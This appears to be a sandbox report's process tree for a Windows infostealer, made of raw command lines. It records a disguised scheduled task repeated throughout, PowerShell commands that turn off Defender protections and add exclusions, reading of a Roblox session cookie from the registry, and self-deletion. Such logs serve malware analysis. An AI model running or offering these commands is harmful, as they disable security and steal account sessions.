C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4832
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3700
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4708
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4924
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4304
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4548
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3612
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3040
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2264
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2572
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3144
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5072
-
C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:3960

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:628

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3080

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1684

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:816

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4896

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:5008

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2476

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:212

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2388

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:3844

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3788

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1532

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1544

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:780

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:5072

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:704

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1416

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:2080
C:\Windows\System32\cmd.exe  2⤵
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"' & exit
  PID:3040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  3⤵
  powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"'
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:2664

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe  4⤵
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  PID:3452

C:\Windows\SysWOW64\WScript.exe  5⤵
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\play.vbs"
  - Enumerates connected drives
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:624
C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4344

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:8

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3176

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:2796

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1044

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:2140

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1112

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:2580

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1980

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:3700

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4944

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1316

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3112

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1528

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3176

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3268

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2728

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:2636
C:\Windows\System32\cmd.exe  2⤵
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"' & exit
  PID:2264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  3⤵
  powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"'
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3944

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe  4⤵
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3464

C:\Windows\System32\Wbem\wmic.exe  5⤵
  "wmic.exe" csproduct get uuid
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:4584

C:\Windows\SYSTEM32\attrib.exe  5⤵
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"
  - Views/modifies file attributes
  PID:740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  5⤵
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe'
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  5⤵
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  5⤵
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  5⤵
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:2748

C:\Windows\System32\Wbem\wmic.exe  5⤵
  "wmic.exe" os get Caption
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:8

C:\Windows\System32\Wbem\wmic.exe  5⤵
  "wmic.exe" computersystem get totalphysicalmemory
  - Loads dropped DLL
  PID:3900

C:\Windows\System32\Wbem\wmic.exe  5⤵
  "wmic.exe" csproduct get uuid
  PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  5⤵
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  PID:644

C:\Windows\System32\Wbem\wmic.exe  5⤵
  "wmic" path win32_VideoController get name
  - Detects videocard installed
  PID:3176

C:\Windows\SYSTEM32\cmd.exe  5⤵
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe" && pause
  PID:4852

C:\Windows\system32\PING.EXE  6⤵
  ping localhost
  - Runs ping.exe
  PID:1408
C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2580

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:4832

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1576

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3496

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4584

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:2956

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2420

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1564

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4888

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:4600

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3132

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:852

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:404

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:2252

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4764

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:4468

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3144

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3956

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3892

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1968

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1388

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4136

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1032

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3820

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1316

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:628

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1488

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1576

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3508

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4784

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4428

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3980

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2376

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1832

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2432

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:440

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2444

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4616

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2956

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4060

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4460

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1020
C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3128

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:2160

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2376

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1848

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4136

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:392

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3620

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1812

C:\Windows\SYSTEM32\CMD.exe  2⤵
